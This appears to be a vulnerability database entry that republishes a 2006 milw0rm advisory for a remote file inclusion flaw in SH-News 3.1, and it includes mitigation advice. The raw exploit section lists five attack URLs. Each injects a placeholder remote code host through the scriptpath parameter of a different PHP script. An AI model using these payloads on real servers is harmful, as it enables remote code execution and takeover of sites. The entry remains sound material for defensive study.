SH-News (RFI)

vendor:

SH-News

by:

v1per-haCker

7,5

CVSS

HIGH

Remote File Inclusion (RFI)

CWE

Product Name: SH-News

Affected Version From: 3.1

Affected Version To: 3.1

Patch Exists: NO

Related CWE: N/A

CPE: a:sh-news:sh-news

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

SH-News is vulnerable to Remote File Inclusion (RFI) vulnerability. An attacker can exploit this vulnerability by sending a malicious URL in the scriptpath parameter of the vulnerable scripts. This will allow the attacker to execute arbitrary code on the vulnerable server.

Mitigation:

Disable remote file inclusion, validate user input, and use a web application firewall.

Source

Exploit-DB raw data:

#==================================================================
#  SH-News (RFI)
#==================================================================
# Info:-
#
# Scripts:  SH-News
# Download: http://www.hotscripts.com/jump.php?listing_id=19561&jump_type=1
# Version : 3.1
# Dork & vuln : download scripts and think :)
# Note : The vuln not tested on other version :)
#
#==================================================================
#Exploit :
#
#http://localhost/path/report.php?scriptpath=http://EvElCoDe.txt?
#http://localhost/path/archive.php?scriptpath=http://EvElCoDe.txt?
#http://localhost/path/comments.php?scriptpath=http://EvElCoDe.txt?
#http://localhost/path/init.php?scriptpath=http://EvElCoDe.txt?
#http://localhost/path/news.php?scriptpath=http://EvElCoDe.txt?
#
#==================================================================
#Discoverd By : v1per-haCker
#
#Conatact : v1per-hacker[at]hotmail.com
#XP10_hackEr Team
#Greetz to : abu_shahad ; RooT-shilL ; hitler_jeddah ; BooB11 ; FaTaL ;
#               ThE-WoLf-KsA ; mohandko ; fooooz ; maVen ; fucker_net ;
#	    metoovet
#and all members in XP10_hackEr Team
#thanx to str0ke :)
#WWW.XP10.COM
===================================================================

# milw0rm.com [2006-10-11]